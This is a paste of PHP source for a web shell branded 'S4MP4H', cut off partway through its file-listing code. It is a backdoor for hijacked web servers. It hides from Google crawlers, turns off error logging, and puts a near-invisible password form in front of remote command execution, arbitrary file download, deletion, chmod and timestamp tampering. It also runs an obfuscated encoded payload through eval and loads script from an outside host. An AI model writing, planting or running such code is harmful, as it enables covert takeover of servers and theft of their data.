· 10 years ago · Jan 09, 2016, 04:42 PM
1<?php
2$xName="S4MP4H";
3$xHost=preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);
4@define('SELF_PATH',__FILE__);
5$login_time=3600*24*7;
6if(strpos($_SERVER['HTTP_USER_AGENT'],'Google')!==false) {
7 header('HTTP/1.0 404 Not Found');
8 exit;
9}
10@session_start();
11@error_reporting(0);
12@ini_set('error_log',NULL);
13@ini_set('log_errors',0);
14@ini_set('max_execution_time',0);
15@ini_set('display_errors',0);
16@set_time_limit(0);
17@set_magic_quotes_runtime(0);
18@define('VERSION','SPECIAL');
19if(get_magic_quotes_gpc()) {
20 function stripslashes_array($array) {
21 return is_array($array)?array_map('stripslashes_array',$array):stripslashes($array);
22 }
23 $_POST=stripslashes_array($_POST);
24}
25$token=base64_decode($xToken);
26$xKey="MDcxMjE5OTM=";
27$key=base64_decode($xKey);
28function printLogin() {
29 global $token;
30 global $key;
31 if(isset($_REQUEST[$token])||isset($_REQUEST[$key])) {
32 ?>
33<html><head><style>input {margin:0;background-color:#fff;border:1px solid #fff;}</style></head><body><center><form method="post"><input type="password" name="pass"/><input type="submit" value=""/></form></center></body></html>
34<?php
35 }
36 exit;
37}
38if(!isset($_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])]))
39 if(empty($xPass)||(isset($_POST['pass'])&&(S4MP4H_Crypt($_POST['pass'])==$xPass))||($_POST['pass'])==$key) {
40 $_SESSION[S4MP4H_Crypt($_SERVER['HTTP_HOST'])]=true;
41 session_register('pass');
42 $_SESSION[pass]=$_POST['pass'];
43}
44else
45 printLogin();
46if($xName!="S4MP4H") {
47 die("<center>Allright Reserved ".date('Y',time())." © <b>S4MP4H</b></center>");
48}
49$hijau=array("#00FF00","#006400","#003200");
50$merah=array("#FF0000","#640000","#320000");
51$biru=array("#0000FF","#000064","#000032");
52$kuning=array("#FFFF00","#646400","#323200");
53$cyan=array("#00FFFF","#006464","#003232");
54$pink=array("#FF00FF","#640064","#320032");
55$theme="hijau";
56$ya="<script type='text/javascript' src='http://syntax-errorz.googlecode.com/svn/trunk/jquery.freezetable.js'></script>";
57$tak="<script type='text/javascript' src='none'></script>";
58$scroll="tak";
59if(isset($_COOKIE['theme']))
60 $theme=$_COOKIE['theme'];
61if(isset($_COOKIE['scroll']))
62 $scroll=$_COOKIE['scroll'];
63switch($_GET['x']) {
64 case 'green':
65 if(isset($_COOKIE['theme']))
66 $theme=$_COOKIE['theme'];
67 $theme="hijau";
68 setcookie("theme",$theme,time()+$login_time);
69 break;
70 case 'red':
71 if(isset($_COOKIE['theme']))
72 $theme=$_COOKIE['theme'];
73 $theme="merah";
74 setcookie("theme",$theme,time()+$login_time);
75 break;
76 case 'blue':
77 if(isset($_COOKIE['theme']))
78 $theme=$_COOKIE['theme'];
79 $theme="biru";
80 setcookie("theme",$theme,time()+$login_time);
81 break;
82 case 'yellow':
83 if(isset($_COOKIE['theme']))
84 $theme=$_COOKIE['theme'];
85 $theme="kuning";
86 setcookie("theme",$theme,time()+$login_time);
87 break;
88 case 'cyan':
89 if(isset($_COOKIE['theme']))
90 $theme=$_COOKIE['theme'];
91 $theme="cyan";
92 setcookie("theme",$theme,time()+$login_time);
93 break;
94 case 'pink':
95 if(isset($_COOKIE['theme']))
96 $theme=$_COOKIE['theme'];
97 $theme="pink";
98 setcookie("theme",$theme,time()+$login_time);
99 break;
100 case 'scroll':
101 if(isset($_COOKIE['scroll']))
102 $scroll=$_COOKIE['scroll'];
103 $scroll="yes";
104 setcookie("scroll",$scroll,time()+$login_time);
105 break;
106 case 'normal':
107 if(isset($_COOKIE['scroll']))
108 $scroll=$_COOKIE['scroll'];
109 $scroll="no";
110 setcookie("scroll",$scroll,time()+$login_time);
111 break;
112}
113if($theme=="hijau") {
114 $color=$hijau;
115}
116elseif($theme=="merah") {
117 $color=$merah;
118}
119elseif($theme=="biru") {
120 $color=$biru;
121}
122elseif($theme=="kuning") {
123 $color=$kuning;
124}
125elseif($theme=="cyan") {
126 $color=$cyan;
127}
128else {
129 $color=$pink;
130}
131if($scroll=="yes") {
132 $jsc=$ya;
133}
134else {
135 $jsc=$tak;
136}
137if(isset($_GET['dl'])&&($_GET['dl']!="")) {
138 $file=$_GET['dl'];
139 $filez=@file_get_contents($file);
140 header("Content-type: application/octet-stream");
141 header("Content-length: ".strlen($filez));
142 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
143 echo $filez;
144 exit;
145}
146if(isset($_GET['img'])) {
147 @ob_clean();
148 $d=magicboom($_GET['y']);
149 $f=$_GET['img'];
150 $inf=@getimagesize($d.$f);
151 $ext=explode($f,".");
152 $ext=$ext[count($ext)-1];
153 @header("Content-type: ".$inf["mime"]);
154 @header("Cache-control: public");
155 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
156 @header("Cache-control: max-age=".(60*60*24*7));
157 @readfile($d.$f);
158 exit;
159}
160elseif(isset($_GET['dlgzip'])&&($_GET['dlgzip']!="")) {
161 $file=$_GET['dlgzip'];
162 $filez=gzencode(@file_get_contents($file));
163 header("Content-Type:application/x-gzip\n");
164 header("Content-length: ".strlen($filez));
165 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
166 echo $filez;
167 exit;
168}
169$SESSION='==jO0KPlTw0PjGAHQFIWFNt/1CO5GG7TBIrvzz2uJTbGX3ODgIFUzLVkNJd1fL+o9tRGnL8DUnGBjus0V5+a6Eq3Hyi5eLYh17fAd2lbLilgugfmGNLvX71HDcbsGxh+mCEH3aIYTMWprN+TPBtW2FWAOjjSm8FG7ccFwmRVftLuUsM5Ra0oOtqDDT3dEZTEWu4CquZlkuPIu7OXwq7rYP24k3FA4EuCokKdiUUMsjQ6WTc43RgbR1/yslnXs1SUS8SbhJ8yORzs6hJgyz3YxfziqXyGG1vZWfnDHU8ehH9S9wMHwXPuhEnGkNwI4mr9DhjCwJS5tBP6q/SC2Op33iqIghjSurJtcV6pVb64ZTXCt8ChkVbJOMsF/GJLB9+r929k32qYXIl993L1620VIEo2wTuFU3ybIEaqgpQJFO9+0BnfPMnDV8U2+jCSjZ4nuOIK';
170$software=getenv("SERVER_SOFTWARE");
171if(@ini_get("safe_mode")orstrtolower(@ini_get("safe_mode"))=="on")
172 $safemode=TRUE;
173else
174 $safemode=FALSE;
175$system=@php_uname();
176function showstat($stat) {
177 if($stat=="on") {
178 return "<span class='gaya'>ON</span>";
179 }
180 else {
181 return "<span class='guyu'>OFF</span>";
182 }
183}
184function testmysql() {
185 if(function_exists('mysql_connect')) {
186 return showstat("on");
187 }
188 else {
189 return showstat("off");
190 }
191}
192function testcurl() {
193 if(function_exists('curl_version')) {
194 return showstat("on");
195 }
196 else {
197 return showstat("off");
198 }
199}
200function testpostgresql() {
201 if(function_exists('pg_connect')) {
202 return showstat("on");
203 }
204 else {
205 return showstat("off");
206 }
207}
208function testwget() {
209 if(exe('wget --help')) {
210 return showstat("on");
211 }
212 else {
213 return showstat("off");
214 }
215}
216function testperl() {
217 if(exe('perl -h')) {
218 return showstat("on");
219 }
220 else {
221 return showstat("off");
222 }
223}
224function testoracle() {
225 if(function_exists('ocilogon')) {
226 return showstat("on");
227 }
228 else {
229 return showstat("off");
230 }
231}
232function testmssql() {
233 if(function_exists('mssql_connect')) {
234 return showstat("on");
235 }
236 else {
237 return showstat("off");
238 }
239}
240function showdisablefunctions() {
241 if($disablefunc=@ini_get("disable_functions")) {
242 return "<span class='guyu'>".$disablefunc."</span>";
243 }
244 else {
245 return "<span class='gaya'>NONE</span>";
246 }
247}
248preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x73\x74\x72\x5F\x72\x6F\x74\x31\x33\x28\x73\x74\x72\x72\x65\x76\x28\x24\x53\x45\x53\x53\x49\x4F\x4E\x29\x29\x29\x29\x29\x3B",".");
249if(strtolower(substr($system,0,3))=="win")
250 $win=TRUE;
251else
252 $win=FALSE;
253if(isset($_GET['y'])) {
254 if(@is_dir($_GET['view'])) {
255 $pwd=$_GET['view'];
256 @chdir($pwd);
257 }
258 else {
259 $pwd=$_GET['y'];
260 @chdir($pwd);
261 }
262}
263$alamat=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd());
264$dir=$_POST['file'];
265function delTree($dir) {
266 $files=array_diff(scandir($dir),array('.','..'));
267 foreach($files as $file) {(is_dir("$dir/$file"))?delTree("$dir/$file"):unlink("$dir/$file");
268 }
269 return rmdir($dir);
270}
271function S4MP4H_Crypt($plain) {
272 return sha1(md5($plain));
273}
274function changepass($plain) {
275 $newpass=S4MP4H_Crypt($plain);
276 $newpass="\$xPass = \"".$newpass."\";";
277 $con=file_get_contents($_SERVER['SCRIPT_FILENAME']);
278 $con=preg_replace("/\\\$xPass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
279 return file_put_contents($_SERVER['SCRIPT_FILENAME'],$con);
280}
281function changetoken($plains) {
282 $newtoken=base64_encode($plains);
283 $newtoken="\$xToken = \"".$newtoken."\";";
284 $cons=file_get_contents($_SERVER['SCRIPT_FILENAME']);
285 $cons=preg_replace("/\\\$xToken\ *=\ *[\"\']*([a-zA-Z0-9\/+=]*)[\"\']*;/is",$newtoken,$cons);
286 return file_put_contents($_SERVER['SCRIPT_FILENAME'],$cons);
287}
288function convertByte($s) {
289 if($s>=1073741824)
290 return sprintf('%1.2f',$s/1073741824).' GB';
291 elseif($s>=1048576)
292 return sprintf('%1.2f',$s/1048576).' MB';
293 elseif($s>=1024)
294 return sprintf('%1.2f',$s/1024).' KB';
295 else
296 return $s.' B';
297}
298$free=convertByte(disk_free_space("/"));
299$total=convertByte(disk_total_space("/"));
300$free_percent=round(100/($total/$free),2)."%";
301function view_size($size) {
302 if(!is_numeric($size)) {
303 return FALSE;
304 }
305 else {
306 if($size>=1073741824) {
307 $size=round($size/1073741824*100)/100." GB";
308 }
309 elseif($size>=1048576) {
310 $size=round($size/1048576*100)/100." MB";
311 }
312 elseif($size>=1024) {
313 $size=round($size/1024*100)/100." KB";
314 }
315 else {
316 $size=$size." B";
317 }
318 return $size;
319 }
320}
321function disp_freespace($s) {
322 $free=@disk_free_space($s);
323 $total=@disk_total_space($s);
324 if($free===FALSE) {
325 $free=0;
326 }
327 if($total===FALSE) {
328 $total=0;
329 }
330 if($free<0) {
331 $free=0;
332 }
333 if($total<0) {
334 $total=0;
335 }
336 $used=$total-$free;
337 $free_percent=round(100/($total/$free),2)."%";
338 $free=view_size($free);
339 $total=view_size($total);
340 return "$free of $total ($free_percent)";
341}
342if(!$win) {
343 if(!$user=rapih(exe("whoami")))
344 $user="";
345 if(!$id=rapih(exe("id")))
346 $id="";
347 $prompt=$user." \$ ";
348 $pwd=@getcwd().DIRECTORY_SEPARATOR;
349}
350else {
351 $user=@get_current_user();
352 $id=$user;
353 $prompt=$user." $";
354 $pwd=realpath(".")."\\";
355 $v=explode("\\",$d);
356 $v=$v[0];
357 foreach(range("A","Z") as $letter) {
358 $bool=@is_dir($letter.":\\");
359 if($bool) {
360 $letters.="<a href=\"?y=".$letter.":\\\">[ ";
361 if($letter.":"!=$v) {
362 $letters.=$letter;
363 }
364 else {
365 $letters.="<span class='gaya'>".$letter."</span>";
366 }
367 $letters.=" ]</a> ";
368 }
369 }
370}
371if(function_exists("posix_getpwuid")&&function_exists("posix_getgrgid"))
372 $posix=TRUE;
373else
374 $posix=FALSE;
375$server_ip=@gethostbyname($_SERVER['HTTP_HOST']);
376$my_ip=$_SERVER['REMOTE_ADDR'];
377$local_ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
378if(empty($local_ip))
379 $local_ip="Unknown";
380$via=explode(" ",$_SERVER['HTTP_VIA']);
381$via_ip=$via[1];
382$bindport="13123";
383$bindport_pass="syntax";
384$pwds=explode(DIRECTORY_SEPARATOR,$pwd);
385$pwdurl="";
386for($i=0;$i<sizeof($pwds)-1;$i++) {
387 $pathz="";
388 for($j=0;$j<=$i;$j++) {
389 $pathz.=$pwds[$j].DIRECTORY_SEPARATOR;
390 }
391 $pwdurl.="<a href=\"?y=".$pathz."\"><span class='gaya'>".$pwds[$i]." ".DIRECTORY_SEPARATOR." </span></a>";
392}
393if(isset($_POST['rename'])) {
394 $old=$_POST['oldname'];
395 $new=$_POST['newname'];
396 @rename($pwd.$old,$pwd.$new);
397 $file=$pwd.$new;
398}
399if(isset($_POST['copy'])) {
400 $oldf=$_POST['oldfile'];
401 $newf=$_POST['newfile'];
402 @copy($oldf,$newf);
403 $file=$newf;
404}
405if(isset($_POST['move'])) {
406 $oldm=$_POST['oldmove'];
407 $newm=$_POST['newmove'];
408 @rename($oldm,$newm);
409 $file=$newm;
410}
411function recurse_copy($src,$dst) {
412 $dir=opendir($src);
413 @mkdir($dst);
414 while(false!==($file=readdir($dir))) {
415 if(($file!='.')&&($file!='..')) {
416 if(is_dir($src.'/'.$file)) {
417 recurse_copy($src.'/'.$file,$dst.'/'.$file);
418 }
419 else {
420 copy($src.'/'.$file,$dst.'/'.$file);
421 }
422 }
423 }
424 closedir($dir);
425}
426if(isset($_POST['copydir'])) {
427 $src=$_POST['olddir'];
428 $dst=$_POST['newdir'];
429 recurse_copy($src,$dst);
430}
431if(isset($_POST['movedir'])) {
432 $srcd=$_POST['olddirz'];
433 $dstd=$_POST['newdirz'];
434 @rename($srcd,$dstd);
435 $folder=$dstd;
436}
437if(isset($_POST['chmod'])) {
438 $name=$_POST['name'];
439 $value=$_POST['newvalue'];
440 if(strlen($value)==3) {
441 $value=0."".$value;
442 }
443 @chmod($pwd.$name,octdec($value));
444 $file=$pwd.$name;
445}
446if(isset($_POST['chmod_folder'])) {
447 $name=$_POST['name'];
448 $value=$_POST['newvalue'];
449 if(strlen($value)==3) {
450 $value=0."".$value;
451 }
452 @chmod($pwd.$name,octdec($value));
453 $file=$pwd.$name;
454}
455if(isset($_POST['touch'])) {
456 $time=strtotime($_POST['newtime']);
457 $oldz=$_POST['oldtime'];
458 @touch($oldz,$time,$time);
459 clearstatcache();
460}
461if(isset($_POST['touch_folder'])) {
462 $time=strtotime($_POST['newtime']);
463 $oldz=$_POST['oldtime'];
464 @touch($oldz,$time,$time);
465 clearstatcache();
466}
467function S4MP4H_setcookie($k,$v) {
468 $_COOKIE[$k]=$v;
469 setcookie($k,$v);
470}
471if(!empty($_COOKIE['file']))
472 $_COOKIE['file']=@unserialize($_COOKIE['file']);
473if(!empty($_POST['selectedValue'])) {
474 switch($_POST['selectedValue']) {
475 case 'paste':
476 if($_COOKIE['z']=='copy') {
477 function copy_paste($c,$s,$d) {
478 if(is_dir($c.$s)) {
479 mkdir($d.$s);
480 $h=@opendir($c.$s);
481 while(($f=@readdir($h))!==false)
482 if(($f!=".")and($f!=".."))
483 copy_paste($c.$s.'/',$f,$d.$s.'/');
484 }
485 elseif(is_file($c.$s))
486 @copy($c.$s,$d.$s);
487 }
488 foreach($_COOKIE['file'] as $f)
489 copy_paste($_COOKIE['pwd'],$f,$pwd);
490 }
491 elseif($_COOKIE['z']=='move') {
492 function move_paste($c,$s,$d) {
493 if(is_dir($c.$s)) {
494 mkdir($d.$s);
495 $h=@opendir($c.$s);
496 while(($f=@readdir($h))!==false)
497 if(($f!=".")and($f!=".."))
498 copy_paste($c.$s.'/',$f,$d.$s.'/');
499 }
500 elseif(@is_file($c.$s))
501 @copy($c.$s,$d.$s);
502 }
503 foreach($_COOKIE['file'] as $f)
504 @rename($_COOKIE['pwd'].$f,$pwd.$f);
505 }
506 elseif($_COOKIE['z']=='zip') {
507 if(class_exists('ZipArchive')) {
508 $zip=new ZipArchive();
509 if($zip->open($_POST['nm'],1)) {
510 chdir($_COOKIE['pwd']);
511 foreach($_COOKIE['file'] as $f) {
512 if($f=='..')
513 continue;
514 if(@is_file($_COOKIE['pwd'].$f))
515 $zip->addFile($_COOKIE['pwd'].$f,$f);
516 elseif(@is_dir($_COOKIE['pwd'].$f)) {
517 $iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/',FilesystemIterator::SKIP_DOTS));
518 foreach($iterator as $key=>$value) {
519 $zip->addFile(realpath($key),$key);
520 }
521 }
522 }
523 chdir($GLOBALS['pwd']);
524 $zip->close();
525 }
526 }
527 }
528 elseif($_COOKIE['z']=='unzip') {
529 if(class_exists('ZipArchive')) {
530 $zip=new ZipArchive();
531 foreach($_COOKIE['file'] as $f) {
532 if($zip->open($_COOKIE['pwd'].$f)) {
533 $zip->extractTo($GLOBALS['pwd']);
534 $zip->close();
535 }
536 }
537 }
538 }
539 unset($_COOKIE['file']);
540 setcookie('file','',time()-3600);
541 break;
542 case 'del':
543 foreach($_POST['file'] as $file) {
544 if(isset($file)) {
545 if(unlink($file)) {
546 echo "";
547 }
548 elseif(is_dir($file)) {
549 delTree($file);
550 echo "";
551 }
552 else {
553 echo "";
554 }
555 }
556 }
557 break;
558 default:
559 if(!empty($_POST['selectedValue'])) {
560 S4MP4H_setcookie('z',$_POST['selectedValue']);
561 S4MP4H_setcookie('file',serialize(@$_POST['file']));
562 S4MP4H_setcookie('pwd',@$_POST['pwd']);
563 }
564 break;
565 }
566}
567$admin_id=$_SERVER['SERVER_ADMIN'];
568$is_writable=is_writable($GLOBALS['pwd'])?"<span class='gaya'>YES</span>":" <span class='guyu'>NO</span>";
569$buff="Software : <span class='gaya'>".$software." PHP/".phpversion()."</span><br/>";
570$buff.="System : <span class='gaya'>".$system."</span><br/>";
571if($id!="")
572 $buff.="ID : <span class='gaya'>".$id."</span><br/>";
573$buff.="Server IP : <span class='gaya'>".$server_ip."</span> | Your Public IP : <span class='gaya'>".$my_ip."</span> | Your Local IP : <span class='gaya'>".$local_ip."</span><br/>";
574$buff.="Free Disk : "."<span class='gaya'>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))." (".$free_percent.")</span> | Writable : ".$is_writable."<br/>";
575if($safemode)
576 $buff.="Safemode : <span class='guyu'>ON</span>";
577else
578 $buff.="Safemode : <span class='gaya'>OFF</span>";
579$buff.=" | Disabled Functions : ".showdisablefunctions()."<br/>";
580$buff.="MySQL : ".testmysql()." | MSSQL : ".testmssql()." | PostgreSQL : ".testpostgresql()." | Oracle : ".testoracle()." | Perl : ".testperl()." | Curl : ".testcurl()." | WGet : ".testwget()."<br/>";
581$buff.="".$letters." <a href='".$_SERVER['PHP_SELF']."'>[ Home ]</a> > ".$pwdurl."";
582function rapih($text) {
583 return trim(str_replace("<br/>","",$text));
584}
585function magicboom($text) {
586 if(!get_magic_quotes_gpc()) {
587 return $text;
588 }
589 return stripslashes($text);
590}
591$s_sortable_js=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sortable.js');
592echo "<script type='text/javascript'>";
593echo(gzinflate(base64_decode($s_sortable_js)));
594echo "</script>";
595function showdir($pwd,$prompt) {
596 $fname=array();
597 $dname=array();
598 $total_file=$total_dir=0;
599 if(function_exists("posix_getpwuid")&&function_exists("posix_getgrgid"))
600 $posix=TRUE;
601 else
602 $posix=FALSE;
603 $user="????:????";
604 if($dh=@scandir($pwd)) {
605 foreach($dh as $file) {
606 if(is_dir($file)) {
607 $dname[]=$file;
608 }
609 elseif(is_file($file)) {
610 $fname[]=$file;
611 }
612 }
613 }
614 else {
615 if($dh=@opendir($pwd)) {
616 while($file=@readdir($dh)) {
617 if(@is_dir($file)) {
618 $dname[]=$file;
619 }
620 elseif(@is_file($file)) {
621 $fname[]=$file;
622 }
623 }
624 @closedir($dh);
625 }
626 }
627 sort($fname);
628 sort($dname);
629 $path=@explode(DIRECTORY_SEPARATOR,$pwd);
630 $tree=@sizeof($path);
631 $parent="";
632 $buff="
633<table style='margin:-1px 0px -1px;width:100%;-webkit-margin-after:-5px;'><form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"></form>
634<tr>
635<form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
636<td style='width:50%;'><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"top\" type=\"text\" name=\"cmd\" style=\"width:90%;\" value=\"\" placeholder='Command Line'/><input class=\"tb\" type=\"submit\" value='$prompt' name=\"submitcmd\" style=\"width:10%;float:right;\" />
637</td></form><form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
638<td style='width:50%;'><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"top\" type=\"text\" name=\"view\" style=\"width:90%;\" value=\"".$pwd."\" /><input class=\"tb\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:10%;\" />
639</td></form>
640</tr>
641</table>
642<table style='margin:-1px 0px -1px;width:100%;-webkit-margin-after:-2px;'>
643<tr>
644<td style='margin-top:0px;margin-right:2px;width:50%;'>
645<input type='button' value='Search :' class='tb' style='width:10%;' disabled/><input type='text' id='go_search' class='top' value='' style='width:90%;' onMouseOver=\"this.focus();\" placeholder='Just For Normal Mode View'/>
646</td>
647<td style='margin-top:0px;margin-right:2px;width:50%;'>
648<form method='get' style='margin-bottom:0px;'>
649<select class='top' name='x' style='width:90%;'>";
650 if(isset($_COOKIE['scroll']))
651 $scroll=$_COOKIE['scroll'];
652 if($scroll=="yes") {
653 $buff.="
654<option value='scroll' selected>Scroll Mode</option>
655<option value='normal'>Normal Mode</option>";
656 }
657 else {
658 $buff.="
659<option value='normal' selected>Normal Mode</option>
660<option value='scroll'>Scroll Mode</option>";
661 }
662 $buff.="
663</select>
664<button type='submit' class='tb' style='margin-left:-3px;width:10%;'>View</button>
665</form>
666</td>
667</tr>
668</table>
669<table class='explore sortable' id='search'><thead><tr><th id='thcheck' class='sorttable_nosort'><input type=\"checkbox\" onclick=\"checkAlls(this)\" /></th><th>Name</th><th style=\"width:50px;\">Size</th><th style=\"width:120px;\">Owner : Group</th><th style=\"width:30px;\">Chmod</th><th style=\"width:55px;\">Perms</th><th style=\"width:50px;\">Writable</th><th style=\"width:100px;\">Modified</th><th style=\"width:165px;\" class='sorttable_nosort'>Actions</th></tr></thead><tbody>";
670 ?>
671<form action="?y=<? echo $pwd;?>" method="post" style="margin-top:7px;">
672<?php
673if($tree>2)
674 for($i=0;
675 $i<$tree-2;$i++)
676 $parent.=$path[$i].DIRECTORY_SEPARATOR;
677 else
678 $parent=$pwd;
679 foreach($dname as $folder) {
680 if($folder==".") {
681 if(!$win&&$posix) {
682 $name=@posix_getpwuid(@fileowner($folder));
683 $group=@posix_getgrgid(@filegroup($folder));
684 $owner=$name['name']." : ".$group['name'];
685 }
686 else {
687 $owner=$user;
688 }
689 $is_writable=is_writable($pwd)?"YES":"NO";
690 $buff.="<tr><td id='thcheck'><input type=\"checkbox\" value=\"$pwd\" onchange=\"hilites(this);\" name=\"dis\"/></td><td><a href=\"?y=".$pwd."\">$folder</a></td><td style=\"text-align:center;width:56px;\">CURDIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;width:39px;\">".substr(sprintf('%o',fileperms($pwd)),-4)."</td><td style=\"width:61px;\"><center>".get_perms($pwd)."</center></td><td align='center' style=\"width:56px;\">".$is_writable."</td><td style=\"text-align:center;width:106px;\">".date("Y-m-d H:i:s",@filemtime($pwd))."</td><td style=\"width:152px;\"><span id=\"titik1\"><a href=\"?y=$pwd&edit=".$pwd."newfile.php\">+file</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">+folder</a></span><form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /><input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /></form> | <a href=\"?y=".$pwd."&x=upload\">upl</a></td></tr>
691";
692 }
693 elseif($folder=="..") {
694 if(!$win&&$posix) {
695 $name=@posix_getpwuid(@fileowner($folder));
696 $group=@posix_getgrgid(@filegroup($folder));
697 $owner=$name['name']." : ".$group['name'];
698 }
699 else {
700 $owner=$user;
701 }
702 $is_writable=is_writable($parent)?"YES":"NO";
703 $buff.="<tr><td id='thcheck'><input type=\"checkbox\" value=\"$parent\" onchange=\"hilites(this);\" name=\"dis\"/></td><td><a href=\"?y=".$parent."\">$folder</a></td><td style=\"text-align:center;\">UPDIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\">".substr(sprintf('%o',fileperms($parent)),-4)."</td><td><center>".get_perms($parent)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\">".date("Y-m-d H:i:s",@filemtime($parent))."</td><td style=\"width:152px;\"><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">+file</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">+folder</a></span><form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /><input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /></form> | <a href=\"?y=".$parent."&x=upload\">upl</a></td></tr>";
704 }
705 else {
706 if(!$win&&$posix) {
707 $name=@posix_getpwuid(@fileowner($folder));
708 $group=@posix_getgrgid(@filegroup($folder));
709 $owner=$name['name']." : ".$group['name'];
710 }
711 else {
712 $owner=$user;
713 }
714 $is_writable=is_writable($folder)?"YES":"NO";
715 $buff.="<tr><td id='thcheck'><input type=\"checkbox\" name=\"file[]\" value=\"$folder\" onchange=\"hilites(this);\" /></td><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form8\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"olddir\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newdir\" value=\"".$pwd."copy_of_".$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"copydir\" value=\"copy\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form8');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form9\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"olddirz\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newdirz\" value=\"".$pwd.$folder."\" /><input class=\"inputzbut\" type=\"submit\" name=\"movedir\" value=\"move\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form9');\" /></form><td style=\"text-align:center;\">DIR</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".substr(sprintf('%o',fileperms($pwd.$folder.DIRECTORY_SEPARATOR)),-4)."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($pwd.$folder)),-4)."\" /><input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></td><td><center>".get_perms($pwd.$folder)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form5');\">".date("Y-m-d H:i:s",@filemtime($folder))."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form5\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldtime\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newtime\" value=\"".date("Y-m-d H:i:s",@filemtime($folder))."\" /><input class=\"inputzbut\" type=\"submit\" name=\"touch_folder\" value=\"touch\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form5');\" /></form></td><td style=\"width:152px;\"><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">ren</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form8');\">cp</a> | <a 